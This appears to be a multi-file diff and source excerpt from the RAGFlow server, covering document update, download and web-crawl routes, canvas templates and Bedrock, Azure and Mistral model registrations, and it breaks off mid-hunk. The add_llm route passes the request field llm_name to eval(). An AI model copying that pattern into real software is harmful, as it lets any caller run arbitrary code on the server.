        return construct_json_result(data={"total": total, "docs": docs}, code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)
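
# A small sketch of the query parameters this listing route accepts; host, auth,
# and the DATASET_ID placeholder are assumptions as in the sketches above. Note
# that descend travels as a string and is compared against the literals
# 'True'/'False' in DocumentService.list_documents_in_dataset further below.
#
#     import requests
#
#     session = requests.Session()  # assume it is already authenticated
#     resp = session.get(
#         "http://localhost:9380/dataset/DATASET_ID/documents/",
#         params={"keywords": "report", "offset": 0, "count": 10,
#                 "order_by": "create_time", "descend": "True"},
#     )
#     body = resp.json()
#     print(body["data"]["total"], len(body["data"]["docs"]))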

# ----------------------------update: enable rename-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
@login_required
def update_document(dataset_id, document_id):
    req = request.json
    try:
        legal_parameters = {"name", "enable", "template_type"}

        for key in req.keys():
            if key not in legal_parameters:
                return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")

        # The request body cannot be empty
        if not req:
            return construct_json_result(
                code=RetCode.DATA_ERROR,
                message="Please input at least one parameter that you want to update!")

        # Check whether this dataset exists
        exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")

        # The document does not exist
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document {document_id} cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # Deal with the different keys
        updating_data = {}
        if "name" in req:
            new_name = req["name"]
            updating_data["name"] = new_name
            # Check whether the new_name is suitable
            # 1. no name value
            if not new_name:
                return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")

            # 2. in case there is whitespace at the head or the tail
            new_name = new_name.strip()

            # 3. check whether the new_name keeps the same file extension as before
            if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
                    document.name.lower()).suffix:
                return construct_json_result(
                    data=False,
                    message="The extension of the file cannot be changed",
                    code=RetCode.ARGUMENT_ERROR)

            # 4. check whether the new name is already occupied by another file
            for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
                if d.name == new_name:
                    return construct_json_result(
                        message="Duplicated document name in the same dataset.",
                        code=RetCode.ARGUMENT_ERROR)

        if "enable" in req:
            enable_value = req["enable"]
            if is_illegal_value_for_enum(enable_value, StatusEnum):
                return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["status"] = enable_value

        # TODO: Chunk-method - update parameters inside the json object parser_config
        if "template_type" in req:
            type_value = req["template_type"]
            if is_illegal_value_for_enum(type_value, ParserType):
                return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["parser_id"] = req["template_type"]

        # The process of updating
        if not DocumentService.update_by_id(document_id, updating_data):
            return construct_json_result(
                code=RetCode.OPERATING_ERROR,
                message="Failed to update the document in the database! "
                        "Please check the status of the RAGFlow server and try again!")

        # name part: file service
        if "name" in req:
            # get the file by document id
            file_information = File2DocumentService.get_by_document_id(document_id)
            if file_information:
                exist, file = FileService.get_by_id(file_information[0].file_id)
                FileService.update_by_id(file.id, {"name": req["name"]})

        exist, document = DocumentService.get_by_id(document_id)

        # Success
        return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)


# Helper method to judge whether it's an illegal value
def is_illegal_value_for_enum(value, enum_class):
    return value not in enum_class.__members__.values()
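
# A quick illustration of this membership test. It checks a raw value against the
# enum's member objects, which only works when members compare equal to their
# underlying values, i.e. for str-mixin enums like the StrEnum types used in this
# codebase. The simplified StatusEnum below is a stand-in for api.db.StatusEnum.
#
#     from enum import Enum
#
#     class StatusEnum(str, Enum):  # simplified stand-in; assumes the real enum mixes in str
#         INVALID = "0"
#         VALID = "1"
#
#     print(is_illegal_value_for_enum("1", StatusEnum))    # False: "1" equals StatusEnum.VALID
#     print(is_illegal_value_for_enum("yes", StatusEnum))  # True: no member carries this value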

# ----------------------------download a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
@login_required
def download_document(dataset_id, document_id):
    try:
        # Check whether this dataset exists
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset '{dataset_id}' cannot be found!")

        # Check whether this document exists
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document '{document_id}' cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # The process of downloading
        doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id)  # minio address
        file_stream = MINIO.get(doc_id, doc_location)
        if not file_stream:
            return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)

        file = BytesIO(file_stream)

        # Use send_file with a proper filename and MIME type
        return send_file(
            file,
            as_attachment=True,
            download_name=document.name,
            mimetype='application/octet-stream'  # Set a default MIME type
        )

    # Error
    except Exception as e:
        return construct_error_response(e)
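
# And the download side, as a client sketch; placeholders, host, and auth are
# assumptions as above. The response body is the raw octet stream that send_file
# produces.
#
#     import requests
#
#     session = requests.Session()  # assume it is already authenticated
#     resp = session.get("http://localhost:9380/dataset/DATASET_ID/documents/DOCUMENT_ID")
#     with open("downloaded_copy.bin", "wb") as out:  # local filename is illustrative
#         out.write(resp.content)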

# ----------------------------start parsing-----------------------------------------------------

# ----------------------------stop parsing-----------------------------------------------------

# ----------------------------show the status of the file-----------------------------------------------------

# ----------------------------list the chunks of the file-----------------------------------------------------

# ----------------------------delete the chunk-----------------------------------------------------

# ----------------------------edit the status of the chunk-----------------------------------------------------

# ----------------------------insert a new chunk-----------------------------------------------------

# ----------------------------upload a file-----------------------------------------------------

# ----------------------------get a specific chunk-----------------------------------------------------

# ----------------------------retrieval test-----------------------------------------------------

@@ -32,6 +32,7 @@ def set_dialog():
    dialog_id = req.get("dialog_id")
    name = req.get("name", "New Dialog")
    description = req.get("description", "A helpful Dialog")
+   icon = req.get("icon", "")
    top_n = req.get("top_n", 6)
    top_k = req.get("top_k", 1024)
    rerank_id = req.get("rerank_id", "")
@@ -90,7 +91,8 @@ def set_dialog():
        "top_k": top_k,
        "rerank_id": rerank_id,
        "similarity_threshold": similarity_threshold,
-       "vector_similarity_weight": vector_similarity_weight
+       "vector_similarity_weight": vector_similarity_weight,
+       "icon": icon
    }
    if not DialogService.save(**dia):
        return get_data_error_result(retmsg="Fail to new a dialog!")

@@ -39,6 +39,8 @@ from api.settings import RetCode
from api.utils.api_utils import get_json_result
from rag.utils.minio_conn import MINIO
from api.utils.file_utils import filename_type, thumbnail
+from api.utils.web_utils import html2pdf, is_valid_url


@manager.route('/upload', methods=['POST'])
@@ -116,6 +118,68 @@ def upload():
    return get_json_result(data=True)


@manager.route('/web_crawl', methods=['POST'])
@login_required
@validate_request("kb_id", "name", "url")
def web_crawl():
    kb_id = request.form.get("kb_id")
    if not kb_id:
        return get_json_result(
            data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
    name = request.form.get("name")
    url = request.form.get("url")
    if not is_valid_url(url):
        return get_json_result(
            data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
    e, kb = KnowledgebaseService.get_by_id(kb_id)
    if not e:
        raise LookupError("Can't find this knowledgebase!")

    blob = html2pdf(url)
    if not blob:
        return server_error_response(ValueError("Download failure."))

    root_folder = FileService.get_root_folder(current_user.id)
    pf_id = root_folder["id"]
    FileService.init_knowledgebase_docs(pf_id, current_user.id)
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])

    try:
        filename = duplicate_name(
            DocumentService.query,
            name=name + ".pdf",
            kb_id=kb.id)
        filetype = filename_type(filename)
        if filetype == FileType.OTHER.value:
            raise RuntimeError("This type of file has not been supported yet!")

        location = filename
        while MINIO.obj_exist(kb_id, location):
            location += "_"
        MINIO.put(kb_id, location, blob)
        doc = {
            "id": get_uuid(),
            "kb_id": kb.id,
            "parser_id": kb.parser_id,
            "parser_config": kb.parser_config,
            "created_by": current_user.id,
            "type": filetype,
            "name": filename,
            "location": location,
            "size": len(blob),
            "thumbnail": thumbnail(filename, blob)
        }
        if doc["type"] == FileType.VISUAL:
            doc["parser_id"] = ParserType.PICTURE.value
        if re.search(r"\.(ppt|pptx|pages)$", filename):
            doc["parser_id"] = ParserType.PRESENTATION.value
        DocumentService.insert(doc)
        FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
    except Exception as e:
        return server_error_response(e)
    return get_json_result(data=True)
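
# A hedged example of driving this crawler endpoint. It posts form fields rather
# than JSON because the handler reads request.form; the host, route prefix, and
# auth are assumptions of the sketch.
#
#     import requests
#
#     session = requests.Session()
#     # ... authenticate first (details omitted) ...
#     resp = session.post(
#         "http://localhost:9380/document/web_crawl",  # route prefix is an assumption
#         data={"kb_id": "KB_ID", "name": "infiniflow-homepage", "url": "https://infiniflow.org"},
#     )
#     print(resp.json())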


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name", "kb_id")
@@ -289,7 +353,7 @@ def run():
            return get_data_error_result(retmsg="Tenant not found!")
        ELASTICSEARCH.deleteByQuery(
            Q("match", doc_id=id), idxnm=search.index_name(tenant_id))

        if str(req["run"]) == TaskStatus.RUNNING.value:
            TaskService.filter_delete([Task.doc_id == id])
        e, doc = DocumentService.get_by_id(id)

@@ -331,8 +331,8 @@ def get(file_id):
        e, file = FileService.get_by_id(file_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")

-       response = flask.make_response(MINIO.get(file.parent_id, file.location))
+       b, n = File2DocumentService.get_minio_address(file_id=file_id)
+       response = flask.make_response(MINIO.get(b, n))
        ext = re.search(r"\.([^.]+)$", file.name)
        if ext:
            if file.type == FileType.VISUAL.value:
@@ -343,5 +343,28 @@ def get(file_id):
                'application/%s' %
                ext.group(1))
        return response
    except Exception as e:
        return server_error_response(e)


@manager.route('/mv', methods=['POST'])
@login_required
@validate_request("src_file_ids", "dest_file_id")
def move():
    req = request.json
    try:
        file_ids = req["src_file_ids"]
        parent_id = req["dest_file_id"]
        for file_id in file_ids:
            e, file = FileService.get_by_id(file_id)
            if not e:
                return get_data_error_result(retmsg="File or Folder not found!")
            if not file.tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
        fe, _ = FileService.get_by_id(parent_id)
        if not fe:
            return get_data_error_result(retmsg="Parent Folder not found!")
        FileService.move_file(file_ids, parent_id)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

@@ -109,15 +109,23 @@ def set_api_key():
def add_llm():
    req = request.json
    factory = req["llm_factory"]
-   # For VolcEngine, due to its special authentication method
-   # Assemble volc_ak, volc_sk, endpoint_id into api_key

    if factory == "VolcEngine":
+       # For VolcEngine, due to its special authentication method
+       # Assemble volc_ak, volc_sk, endpoint_id into api_key
        temp = list(eval(req["llm_name"]).items())[0]
        llm_name = temp[0]
        endpoint_id = temp[1]
        api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
                        f'"volc_sk": "{req.get("volc_sk", "")}", ' \
                        f'"ep_id": "{endpoint_id}", ' + '}'
+   elif factory == "Bedrock":
+       # For Bedrock, due to its special authentication method
+       # Assemble bedrock_ak, bedrock_sk, bedrock_region into api_key
+       llm_name = req["llm_name"]
+       api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
+                       f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
+                       f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
    else:
        llm_name = req["llm_name"]
        api_key = "xxxxxxxxxxxxxxx"
@@ -134,7 +142,9 @@ def add_llm():
    msg = ""
    if llm["model_type"] == LLMType.EMBEDDING.value:
        mdl = EmbeddingModel[factory](
-           key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
+           key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
+           model_name=llm["llm_name"],
+           base_url=llm["api_base"])
        try:
            arr, tc = mdl.encode(["Test if the api key is available"])
            if len(arr[0]) == 0 or tc == 0:
@@ -143,7 +153,7 @@ def add_llm():
            msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.CHAT.value:
        mdl = ChatModel[factory](
-           key=llm['api_key'] if factory == "VolcEngine" else None,
+           key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
            model_name=llm["llm_name"],
            base_url=llm["api_base"]
        )
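
# For clarity, a small sketch of the credential blob assembled above. The trailing
# comma before the closing brace means the string is not strict JSON, but it is a
# valid Python dict literal, so something like ast.literal_eval can read it back.
# How the model wrappers actually parse it is not shown in this diff, so that part
# is an assumption.
#
#     import ast
#
#     req = {"bedrock_ak": "AKIA...", "bedrock_sk": "SECRET...", "bedrock_region": "us-east-1"}
#     api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
#                     f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
#                     f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
#     creds = ast.literal_eval(api_key)  # tolerates the trailing comma, unlike json.loads
#     print(creds["bedrock_region"])     # -> us-east-1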


api/contants.py (new file, 16 lines)
@@ -0,0 +1,16 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.

NAME_LENGTH_LIMIT = 2 ** 10

@@ -91,4 +91,9 @@ class FileSource(StrEnum):
    KNOWLEDGEBASE = "knowledgebase"
    S3 = "s3"


+class CanvasType(StrEnum):
+    ChatBot = "chatbot"
+    DocBot = "docbot"

KNOWLEDGEBASE_FOLDER_NAME = ".knowledgebase"
@@ -833,6 +833,31 @@ class API4Conversation(DataBaseModel):
        db_table = "api_4_conversation"


+class UserCanvas(DataBaseModel):
+    id = CharField(max_length=32, primary_key=True)
+    avatar = TextField(null=True, help_text="avatar base64 string")
+    user_id = CharField(max_length=255, null=False, help_text="user_id")
+    title = CharField(max_length=255, null=True, help_text="Canvas title")
+    description = TextField(null=True, help_text="Canvas description")
+    canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
+    dsl = JSONField(null=True, default={})
+
+    class Meta:
+        db_table = "user_canvas"
+
+
+class CanvasTemplate(DataBaseModel):
+    id = CharField(max_length=32, primary_key=True)
+    avatar = TextField(null=True, help_text="avatar base64 string")
+    title = CharField(max_length=255, null=True, help_text="Canvas title")
+    description = TextField(null=True, help_text="Canvas description")
+    canvas_type = CharField(max_length=32, null=True, help_text="Canvas type")
+    dsl = JSONField(null=True, default={})
+
+    class Meta:
+        db_table = "canvas_template"


def migrate_db():
    with DB.transaction():
        migrator = MySQLMigrator(DB)

@@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
+import json
import os
import time
import uuid
@@ -21,11 +22,13 @@ from copy import deepcopy
from api.db import LLMType, UserTenantRole
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
from api.db.services import UserService
+from api.db.services.canvas_service import CanvasTemplateService
+from api.db.services.document_service import DocumentService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
from api.utils.file_utils import get_project_base_directory


def init_superuser():
@@ -152,6 +155,26 @@ factory_infos = [{
    "logo": "",
    "tags": "TEXT EMBEDDING, TEXT RE-RANK",
    "status": "1",
+},{
+    "name": "MiniMax",
+    "logo": "",
+    "tags": "LLM,TEXT EMBEDDING",
+    "status": "1",
+},{
+    "name": "Mistral",
+    "logo": "",
+    "tags": "LLM,TEXT EMBEDDING",
+    "status": "1",
+},{
+    "name": "Azure-OpenAI",
+    "logo": "",
+    "tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
+    "status": "1",
+},{
+    "name": "Bedrock",
+    "logo": "",
+    "tags": "LLM,TEXT EMBEDDING",
+    "status": "1",
+}
    # {
    #     "name": "文心一言",
@@ -380,8 +403,8 @@ def init_llm_factory():
        {
            "fid": factory_infos[7]["name"],
            "llm_name": "maidalun1020/bce-reranker-base_v1",
-           "tags": "RE-RANK, 8K",
-           "max_tokens": 8196,
+           "tags": "RE-RANK, 512",
+           "max_tokens": 512,
            "model_type": LLMType.RERANK.value
        },
        # ------------------------ DeepSeek -----------------------

@@ -536,6 +559,346 @@ def init_llm_factory():
            "max_tokens": 2048,
            "model_type": LLMType.RERANK.value
        },
        # ------------------------ Minimax -----------------------
        {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab6.5-chat",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab6.5s-chat",
            "tags": "LLM,CHAT,245k",
            "max_tokens": 245760,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab6.5t-chat",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab6.5g-chat",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab5.5-chat",
            "tags": "LLM,CHAT,16k",
            "max_tokens": 16384,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[13]["name"],
            "llm_name": "abab5.5s-chat",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        },
        # ------------------------ Mistral -----------------------
        {
            "fid": factory_infos[14]["name"],
            "llm_name": "open-mixtral-8x22b",
            "tags": "LLM,CHAT,64k",
            "max_tokens": 64000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "open-mixtral-8x7b",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "open-mistral-7b",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "mistral-large-latest",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "mistral-small-latest",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "mistral-medium-latest",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "codestral-latest",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[14]["name"],
            "llm_name": "mistral-embed",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.EMBEDDING.value
        },
        # ------------------------ Azure OpenAI -----------------------
        # Please ensure the llm_name is the same as the Azure OpenAI
        # deployment name (e.g., azure-gpt-4o), and the llm_name must
        # be different from the OpenAI llm_name.
        #
        # Each model must be deployed in the Azure OpenAI service; otherwise
        # you will receive the error message 'The API deployment for
        # this resource does not exist'.
        {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-4o",
            "tags": "LLM,CHAT,128K",
            "max_tokens": 128000,
            "model_type": LLMType.CHAT.value + "," + LLMType.IMAGE2TEXT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-35-turbo",
            "tags": "LLM,CHAT,4K",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-35-turbo-16k",
            "tags": "LLM,CHAT,16k",
            "max_tokens": 16385,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-text-embedding-ada-002",
            "tags": "TEXT EMBEDDING,8K",
            "max_tokens": 8191,
            "model_type": LLMType.EMBEDDING.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-text-embedding-3-small",
            "tags": "TEXT EMBEDDING,8K",
            "max_tokens": 8191,
            "model_type": LLMType.EMBEDDING.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-text-embedding-3-large",
            "tags": "TEXT EMBEDDING,8K",
            "max_tokens": 8191,
            "model_type": LLMType.EMBEDDING.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-whisper-1",
            "tags": "SPEECH2TEXT",
            "max_tokens": 25 * 1024 * 1024,
            "model_type": LLMType.SPEECH2TEXT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-4",
            "tags": "LLM,CHAT,8K",
            "max_tokens": 8191,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-4-turbo",
            "tags": "LLM,CHAT,8K",
            "max_tokens": 8191,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-4-32k",
            "tags": "LLM,CHAT,32K",
            "max_tokens": 32768,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[15]["name"],
            "llm_name": "azure-gpt-4-vision-preview",
            "tags": "LLM,CHAT,IMAGE2TEXT",
            "max_tokens": 765,
            "model_type": LLMType.IMAGE2TEXT.value
        },
        # ------------------------ Bedrock -----------------------
        {
            "fid": factory_infos[16]["name"],
            "llm_name": "ai21.j2-ultra-v1",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8191,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "ai21.j2-mid-v1",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8191,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.command-text-v14",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.command-light-text-v14",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.command-r-v1:0",
            "tags": "LLM,CHAT,128k",
            "max_tokens": 128 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.command-r-plus-v1:0",
            "tags": "LLM,CHAT,128k",
            "max_tokens": 128000,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-v2",
            "tags": "LLM,CHAT,100k",
            "max_tokens": 100 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-v2:1",
            "tags": "LLM,CHAT,200k",
            "max_tokens": 200 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-3-sonnet-20240229-v1:0",
            "tags": "LLM,CHAT,200k",
            "max_tokens": 200 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-3-5-sonnet-20240620-v1:0",
            "tags": "LLM,CHAT,200k",
            "max_tokens": 200 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-3-haiku-20240307-v1:0",
            "tags": "LLM,CHAT,200k",
            "max_tokens": 200 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-3-opus-20240229-v1:0",
            "tags": "LLM,CHAT,200k",
            "max_tokens": 200 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "anthropic.claude-instant-v1",
            "tags": "LLM,CHAT,100k",
            "max_tokens": 100 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "amazon.titan-text-express-v1",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "amazon.titan-text-premier-v1:0",
            "tags": "LLM,CHAT,32k",
            "max_tokens": 32 * 1024,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "amazon.titan-text-lite-v1",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "meta.llama2-13b-chat-v1",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "meta.llama2-70b-chat-v1",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "meta.llama3-8b-instruct-v1:0",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "meta.llama3-70b-instruct-v1:0",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "mistral.mistral-7b-instruct-v0:2",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "mistral.mixtral-8x7b-instruct-v0:1",
            "tags": "LLM,CHAT,4k",
            "max_tokens": 4096,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "mistral.mistral-large-2402-v1:0",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "mistral.mistral-small-2402-v1:0",
            "tags": "LLM,CHAT,8k",
            "max_tokens": 8192,
            "model_type": LLMType.CHAT.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "amazon.titan-embed-text-v2:0",
            "tags": "TEXT EMBEDDING",
            "max_tokens": 8192,
            "model_type": LLMType.EMBEDDING.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.embed-english-v3",
            "tags": "TEXT EMBEDDING",
            "max_tokens": 2048,
            "model_type": LLMType.EMBEDDING.value
        }, {
            "fid": factory_infos[16]["name"],
            "llm_name": "cohere.embed-multilingual-v3",
            "tags": "TEXT EMBEDDING",
            "max_tokens": 2048,
            "model_type": LLMType.EMBEDDING.value
        },
    ]
    for info in factory_infos:
        try:
@@ -584,6 +947,20 @@ def init_llm_factory():
    """


def add_graph_templates():
    dir = os.path.join(get_project_base_directory(), "graph", "templates")
    for fnm in os.listdir(dir):
        try:
            cnvs = json.load(open(os.path.join(dir, fnm), "r"))
            try:
                CanvasTemplateService.save(**cnvs)
            except:
                CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
        except Exception as e:
            print("Add graph templates error: ", e)
            print("------------", flush=True)


def init_web_data():
    start_time = time.time()

@@ -591,6 +968,7 @@ def init_web_data():
    if not UserService.get_all().count():
        init_superuser()

+   add_graph_templates()
    print("init web data success:{}".format(time.time() - start_time))


api/db/services/canvas_service.py (new file, 26 lines)
@@ -0,0 +1,26 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from datetime import datetime
import peewee
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
from api.db.services.common_service import CommonService


class CanvasTemplateService(CommonService):
    model = CanvasTemplate


class UserCanvasService(CommonService):
    model = UserCanvas
@@ -23,6 +23,7 @@ from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
from api.settings import chat_logger, retrievaler
from rag.app.resume import forbidden_select_fields4resume
+from rag.nlp import keyword_extraction
from rag.nlp.search import index_name
from rag.utils import rmSpace, num_tokens_from_string, encoder

@@ -80,7 +81,8 @@ def chat(dialog, messages, stream=True, **kwargs):
        if not llm:
            raise LookupError("LLM(%s) not found" % dialog.llm_id)
        max_tokens = 1024
-   else: max_tokens = llm[0].max_tokens
+   else:
